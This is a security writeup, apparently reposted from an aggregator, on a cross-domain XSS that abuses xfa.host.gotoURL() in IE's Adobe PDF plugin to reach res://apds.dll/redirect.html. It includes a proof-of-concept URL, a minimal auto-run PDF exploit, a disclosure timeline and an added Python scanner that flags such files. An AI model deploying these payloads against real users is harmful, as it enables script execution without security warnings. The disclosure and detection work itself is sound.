Self XSS using IE adobes

medium.com · devanshbatham/Awesome-Bugbounty-Writeups · 22 hours ago · vulnerability
AI Summary

A DOM XSS vulnerability in Adobe's PDF ActiveX plugin (res://apds.dll/redirect.html) can be exploited via IE by using the xfa.host.gotoURL() function to bypass same-origin policy restrictions and execute arbitrary JavaScript without security warnings. The vulnerability chains a parameter injection flaw with Adobe's insecure URL redirect handling to achieve cross-domain XSS.

From http:// domain to res:// domain xss by using IE Adobe's PDF ActiveX plugin
by Heige (a.k.a. Superhei) of KnownSec 404 Team, 03/19/2019
heige · ~2 min read · March 19, 2019 (Updated: December 8, 2021)
[Article release: https://paper.seebug.org/860/ ]

1 res://apds.dll/redirect.html dom xss

https://bugs.chromium.org/p/project-zero/issues/detail?id=1598&desc=5 had reported an xss vulnerability in res://apds.dll/redirect.html, and this vulnerability has not been fixed until now. It is a typical dom xss vulnerability, from the res://apds.dll/redirect.html code:

POC: res://apds.dll/redirect.html?target=javascript:alert(1)

2 from http:// domain to res:// domain

Usually, accessing res:// resources from an http:// domain is not allowed. The JavaScript function xfa.host.gotoURL() in Adobe PDF can access multiple kinds of URL, including http(s):// and file://. Of course, in general there will be security prompts when you open such PDF files. But when we use xfa.host.gotoURL() to access res:// or http(s):// through IE Adobe's PDF ActiveX plugin:

    xfa.host.gotoURL("res://apds.dll/redirect.html?target=javascript:alert(1);//");

there are no security alerts, and the xss payload "alert(1)" is executed.

POC: http://xxxxxxx/r.pdf

r.pdf code:

    %PDF-1.4
    1 0 obj <<>> %endobj
    2 0 obj <<>> stream
    1
    endstream endobj
    trailer << /Root << /Pages <<>> /AcroForm << /XFA 2 0 R >> /OpenAction << /S/JavaScript /JS( xfa.host.gotoURL("res://apds.dll/redirect.html?target=javascript:alert(1);//"); ) >> >> >>

demo tweet: https://twitter.com/80vul/status/1048576146835558400

3 fixed?

Due to some security domain isolation in IE, the harm of res:// domain xss is limited. But I think Microsoft should actively fix the res://apds.dll/redirect.html xss vulnerability, and Adobe should disable the URL redirect or give a corresponding security warning. The world can be more beautiful and harmonious!

4 Timeline

October 04, 2018: Report it to Adobe PSIRT and MSRC
October 05, 2018: Adobe tracking number PSIRT-8981.
October 09, 2018: MSRC Case 47932 CRM:0461065793
October 18, 2018: Adobe PSIRT has been investigating and still
November 21, 2018: MSRC: "have completed our investigation and determined that the case doesn't meet the bar for immediate servicing in a security update."
March 19, 2019: Public
October 15, 2019: Adobe fix it in APSB19-49 (CVE-2019-8160) https://helpx.adobe.com/security/products/acrobat/apsb19-49.html
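Added example for defenders (not code from the original post or from Adobe): a small Python scanner that flags a PDF whose /OpenAction JavaScript calls xfa.host.gotoURL() with a res:// or file:// destination, or with a javascript: redirect target, which is the exact chain the writeup describes. The sample bytes are the r.pdf from the post embedded as a constant; the regexes are a pragmatic heuristic written here and assume the /OpenAction dictionary and /JS literal string appear in plain (uncompressed) form.

```python
import re

# Constructed sample: the minimal XFA PDF from the writeup, whose OpenAction
# calls xfa.host.gotoURL() against res://apds.dll/redirect.html.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj <<>> %endobj
2 0 obj <<>> stream
1
endstream endobj
trailer << /Root << /Pages <<>> /AcroForm << /XFA 2 0 R >> /OpenAction << /S/JavaScript /JS( xfa.host.gotoURL("res://apds.dll/redirect.html?target=javascript:alert(1);//"); ) >> >> >>
"""

# /OpenAction dictionary with an inline JavaScript action and a literal /JS( ... ) string.
OPENACTION_JS = re.compile(
    rb"/OpenAction\s*<<.*?/S\s*/JavaScript.*?/JS\s*\((?P<js>.*?)\)\s*>>", re.S)
# First string argument of every xfa.host.gotoURL() call inside that script.
GOTOURL = re.compile(rb"xfa\.host\.gotoURL\s*\(\s*[\"'](?P<url>[^\"']*)[\"']", re.S)
# Schemes a document-open redirect has no business reaching from a web-served PDF.
RISKY_SCHEMES = (b"res://", b"file://", b"javascript:")


def scan_pdf(data: bytes) -> dict:
    """Return findings for OpenAction JavaScript that redirects via xfa.host.gotoURL()."""
    findings = {"open_action_js": False, "gotourl_targets": [], "risky": False}
    m = OPENACTION_JS.search(data)
    if not m:
        return findings
    findings["open_action_js"] = True
    for call in GOTOURL.finditer(m.group("js")):
        url = call.group("url")
        findings["gotourl_targets"].append(url.decode("latin-1"))
        lower = url.lower()
        # res:// plus a javascript: redirect target is the chain from the post;
        # a direct file:// or javascript: destination is flagged for the same reason.
        if lower.startswith(RISKY_SCHEMES) or b"target=javascript:" in lower:
            findings["risky"] = True
    return findings


if __name__ == "__main__":
    print(scan_pdf(SAMPLE_PDF))
```

Compressed object streams and scripts assembled at runtime will not match these patterns, so treat a clean result as "nothing obvious", not as proof of absence.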